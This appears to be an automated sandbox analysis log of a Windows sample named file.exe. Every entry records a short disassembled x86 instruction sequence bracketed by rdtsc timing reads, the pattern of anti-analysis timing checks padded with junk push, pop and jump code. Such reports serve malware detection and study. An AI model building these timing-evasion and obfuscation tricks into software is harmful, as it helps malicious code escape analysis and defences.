Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F637FA second address: F637FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6854C second address: F68551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F67674 second address: F6768F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D4900D0CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F9D4900D0C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F68551 second address: F68567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D493C17D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6768F second address: F676A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F686CF second address: F686D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F687A7 second address: F687AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F687AC second address: F687C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F687C4 second address: F687CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7178F second address: F717A1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F9D493C17C8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F717A1 second address: F717B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9D4900D0C6h 0x00000009 je 00007F9D4900D0C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7193C second address: F71942 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F770EB second address: F770F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771A5 second address: F771E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F9D493C17CAh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F9D493C17D3h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9D493C17CDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771E1 second address: F771EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D4900D0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F771EB second address: F771FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F9D493C17C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B461 second address: F7B482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9D4900D0D9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BB4A second address: F7BB50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BB50 second address: F7BB7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D4h 0x00000007 pushad 0x00000008 js 00007F9D4900D0C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BB7B second address: F7BB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BB81 second address: F7BB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BCCE second address: F7BCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F80492 second address: F8049B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8049B second address: F8049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8049F second address: F804A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F53BF5 second address: F53BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F53BFB second address: F53BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F53BFF second address: F31BA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D493C17C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F9D493C17C8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xor dword ptr [ebp+122D1FCFh], ebx 0x0000002f je 00007F9D493C17CCh 0x00000035 xor dword ptr [ebp+122D2D71h], edx 0x0000003b lea eax, dword ptr [ebp+124989A7h] 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F9D493C17C8h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b mov edx, dword ptr [ebp+122D2FA6h] 0x00000061 nop 0x00000062 jg 00007F9D493C17D0h 0x00000068 push eax 0x00000069 jmp 00007F9D493C17CEh 0x0000006e nop 0x0000006f adc cx, 3368h 0x00000074 clc 0x00000075 call dword ptr [ebp+1245ECD4h] 0x0000007b ja 00007F9D493C17F0h 0x00000081 pushad 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F541EF second address: F5426A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F9D4900D0C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9D4900D0CFh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push esi 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop esi 0x0000001d pop eax 0x0000001e mov eax, dword ptr [eax] 0x00000020 push edi 0x00000021 jnp 00007F9D4900D0DBh 0x00000027 jmp 00007F9D4900D0D5h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push esi 0x00000032 jns 00007F9D4900D0DFh 0x00000038 pop esi 0x00000039 pop eax 0x0000003a and dx, D431h 0x0000003f push D4F02CA2h 0x00000044 push ebx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F543A6 second address: F543AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F543AA second address: F543B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F543B0 second address: F543CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D493C17D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F7FB second address: F7F804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F804 second address: F7F808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7F808 second address: F7F80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FD9B second address: F7FDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDA1 second address: F7FDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDA5 second address: F7FDD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CBh 0x00000007 jbe 00007F9D493C17C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F9D493C17D9h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDD8 second address: F7FDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9D4900D0D7h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FDFF second address: F7FE09 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D493C17D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8606C second address: F86071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F849F5 second address: F849F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F849F9 second address: F84A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D4900D0D8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84B5F second address: F84B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D2h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84B78 second address: F84B82 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D4900D0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84FA6 second address: F84FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9D493C17CBh 0x0000000a jne 00007F9D493C17C6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8513B second address: F85141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F855A8 second address: F855C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F855C6 second address: F855D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F9D4900D0C8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85771 second address: F8578E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8578E second address: F857D9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D4900D0C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F9D4900D0D2h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 jmp 00007F9D4900D0D9h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F857D9 second address: F857F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F9D493C17D5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F857F8 second address: F85809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9D4900D0C6h 0x0000000a jng 00007F9D4900D0C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85809 second address: F8580F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8580F second address: F85813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85917 second address: F8591D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8591D second address: F85927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85927 second address: F8593F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D493C17D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8593F second address: F85948 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85948 second address: F85956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85956 second address: F8595A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F846FA second address: F84700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84700 second address: F84704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84704 second address: F8470A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8470A second address: F84713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84713 second address: F8471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9D493C17C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8471F second address: F84725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84725 second address: F84746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F9D493C17C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jnp 00007F9D493C17C6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F4FF second address: F8F50D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F50D second address: F8F511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F03F second address: F8F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F044 second address: F8F049 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F049 second address: F8F068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9D4900D0CAh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F9D4900D0CCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FD33 second address: F8FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9001C second address: F90022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91C3C second address: F91C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9D493C17C6h 0x0000000a jnc 00007F9D493C17C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F91C4D second address: F91C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CAh 0x00000007 jmp 00007F9D4900D0D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9EA91 second address: F9EA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9DE89 second address: F9DEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9D4900D0C6h 0x0000000a jmp 00007F9D4900D0D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E127 second address: F9E145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E278 second address: F9E28D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E28D second address: F9E296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E296 second address: F9E29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E29C second address: F9E2BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F9D493C17C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E2BD second address: F9E2C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D4900D0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E563 second address: F9E567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E567 second address: F9E578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F9D4900D0CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E578 second address: F9E58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F9D493C17CBh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E58A second address: F9E58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA13C5 second address: FA13CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9D493C17C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1526 second address: FA1548 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9D4900D0CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9D4900D0CEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA81B9 second address: FA81BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA81BF second address: FA81D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D4900D0CEh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F9D4900D0C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA81D3 second address: FA81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA81D7 second address: FA81E1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D4900D0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA81E1 second address: FA81F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jl 00007F9D493C17CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
